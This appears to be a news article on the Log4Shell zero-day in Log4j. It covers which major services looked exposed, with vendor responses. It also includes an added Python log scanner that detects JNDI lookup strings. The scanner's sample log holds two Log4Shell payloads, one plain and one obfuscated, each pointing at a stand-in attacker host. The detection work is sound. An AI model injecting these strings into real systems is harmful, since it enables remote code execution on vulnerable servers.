The list of services with internet-facing infrastructure vulnerable to a critical zero-day vulnerability in the open source Log4j logging utility is immense and reads like a who’s who of the biggest names on the internet, including Apple, Amazon, Cloudflare, Steam, Tesla, Twitter and Baidu.
The vulnerability, now called Log4Shell, came to light on Thursday afternoon, when several Minecraft services and news sites warned of actively circulating attack code that exploited the vulnerability to run malicious code on servers and clients running the world’s best-selling game. It soon became clear that Minecraft was just one of probably thousands of big names to be felled by similar attacks.
A compilation of screenshots posted online documents how some of the world’s most popular and trusted cloud-based services react when given parameters used in the attack. To wit:
The images use a domain name leak detection service called dnslog.cn to see if the target cloud service performs a DNS lookup. Each image shows that the service is accepting connections from an attacker-controlled machine (as evidenced by the IP connection log).
“Normally, typing something in a username should never establish remote network connections, so the fact that it does proves that Log4j is used here and therefore the server could be vulnerable to a remote code execution attack,” Ars reader skizzerz explained in the comments below.
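The behaviour described above, a lookup string in an ordinary input field triggering an outbound connection, is also what defenders can hunt for in their own logs. The following is an added example, not code from the article or from any vendor it names: it scans constructed web-server access-log lines for Log4j JNDI lookup strings, first resolving the nested `${lower:...}`/`${upper:...}` lookups that are commonly used to hide the literal `${jndi:` marker. The IP addresses, hostnames and log lines are all constructed sample data.

```python
import re

# Constructed sample access-log lines (not taken from the article): a benign request,
# a request carrying a plain JNDI lookup in the User-Agent, and one that hides the same
# lookup behind nested ${lower:...} lookups that Log4j resolves before the jndi lookup.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"
203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "POST /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"
"""

# Innermost ${lower:x} / ${upper:x} lookups (no further ${ } nesting inside them).
_NESTED = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# The marker that matters once nesting has been resolved.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Resolve ${lower:x} / ${upper:x} lookups innermost-first until none remain."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
    return text


def is_jndi_lookup(text: str) -> bool:
    """True if the text contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize(text)))


def flag_log_lines(log: str) -> list:
    """Return (line_number, client_ip, normalized_line) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log.splitlines(), 1):
        if is_jndi_lookup(line):
            hits.append((n, line.split(" ", 1)[0], normalize(line)))
    return hits


if __name__ == "__main__":
    for n, ip, line in flag_log_lines(SAMPLE_LOG):
        print(f"line {n} from {ip}: {line}")
```

A match in the access log only shows that a lookup string reached the server; whether Log4j actually evaluated it is what the DNS-callback test in the screenshots establishes, and neither check replaces patching.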
While the images show that the services respond to user input in unintended and potentially dangerous ways, the services are not automatically vulnerable to the types of code execution attacks that have compromised Minecraft servers. That’s because these services typically have multiple layers of defense. If one layer fails, additional layers are often available to reduce or completely eliminate real damage.
On the other hand, the images show that unauthorized persons can abuse Log4Shell to access the servers of some of the world’s most powerful companies in ways they never intended. When asked about access to Apple servers, Malwarebytes director of Mac offerings Thomas Reed said, “This is much worse than if individual devices were vulnerable, and I think at this point it’s an open question what kind of data attackers are likely to be from Apple’s services as we speak.” Apple representatives did not respond to an email asking for comment.
Cloudflare, meanwhile, said in a message that it has taken steps to block attacks on its network and against its customers. Cloudflare Chief Security Officer Joe Sullivan said his team has been unable to reproduce the behavior depicted in the image and does not recognize the IP addresses shown.
Minecraft rolled out a fix on Friday.
The upshot is that it is still too early to say that these services are not vulnerable. For now, people should remain wary and wait for advice from the affected providers.
Listing image by Jeffrey Coolidge / Getty Images